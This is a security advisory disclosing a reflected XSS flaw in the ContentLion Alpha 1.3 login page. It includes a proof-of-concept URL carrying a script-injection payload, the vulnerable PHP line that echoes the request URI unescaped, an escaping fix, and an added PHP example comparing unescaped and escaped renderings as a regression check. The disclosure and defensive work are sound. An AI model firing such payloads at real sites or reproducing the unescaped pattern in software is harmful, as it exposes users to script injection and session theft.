SSCHADV2012-004 - ContentLion Alpha 1.3 XSS vulnerability
Advisory: ContentLion Alpha 1.3 XSS vulnerability
Advisory ID: SSCHADV2012-004
Author: Stefan Schurtz
Affected Software: Successfully tested on ContentLion Alpha 1.3
Vendor URL:
Vendor Status: informed
======================
Vulnerability Description
======================
ContentLion Alpha 1.3 is prone to an XSS vulnerability in the login page: the request URI is echoed unescaped into the action attribute of the login form.
==============
PoC-Exploit
==============
http://[target]/contentlion-alpha-1-3/login.html?'"</script><script>alert('JaVaScr1pT')</script>
// vuln code in system/classes/login.php
if($_SESSION['user']->isGuest()){ ?> <form action="<?PHP echo $_SERVER['REQUEST_URI']; ?>" method="POST">
=====
Solution
=====
if($_SESSION['user']->isGuest()){ ?> <form action="<?PHP echo htmlentities($_SERVER['REQUEST_URI']); ?>" method="POST">
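The following is an added example, not code from the advisory or from ContentLion: it renders the same form tag unescaped, escaped with explicit flags and charset, and with the query string dropped, then counts the tags each variant produces. The function names and the sample request URI are hypothetical and constructed for illustration.

```php
<?php
// Added illustration; not ContentLion code. Function names are hypothetical.

// Pattern from the advisory: the raw request URI lands inside action="...".
function form_open_unescaped(string $requestUri): string
{
    return '<form action="' . $requestUri . '" method="POST">';
}

// Escaped variant: explicit flags and charset instead of relying on defaults
// (before PHP 8.1 the default flags left single quotes unescaped).
function form_open_escaped(string $requestUri): string
{
    $safe = htmlspecialchars($requestUri, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form action="' . $safe . '" method="POST">';
}

// Structural variant: never reflect the query string; post back to the path only.
function form_open_path_only(string $requestUri): string
{
    $path = parse_url($requestUri, PHP_URL_PATH);
    if (!is_string($path)) {
        $path = '/'; // malformed or path-less URI: fall back to the site root
    }
    $safe = htmlspecialchars($path, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form action="' . $safe . '" method="POST">';
}

// Constructed sample input: a query string containing markup characters.
$sample = '/login.html?x="><b>marker</b>';

foreach (['form_open_unescaped', 'form_open_escaped', 'form_open_path_only'] as $fn) {
    $html = $fn($sample);
    // A safe rendering contains exactly one tag: the <form ...> opener itself.
    $tags = preg_match_all('/<[a-z\/]/i', $html);
    printf("%-22s tags=%d  %s\n", $fn, $tags, $html);
}
```

A tag count above one for a variant means the input broke out of the attribute; the same check can be reused as a regression test for any template that writes request data into an attribute.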
================
Disclosure Timeline
================
01-Feb-2012 – vendor informed
01-Feb-2012 – feedback from vendor
====
Credits
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References
=======
http://www.darksecurity.de/advisories/2012/SSCHADV2012-004.txt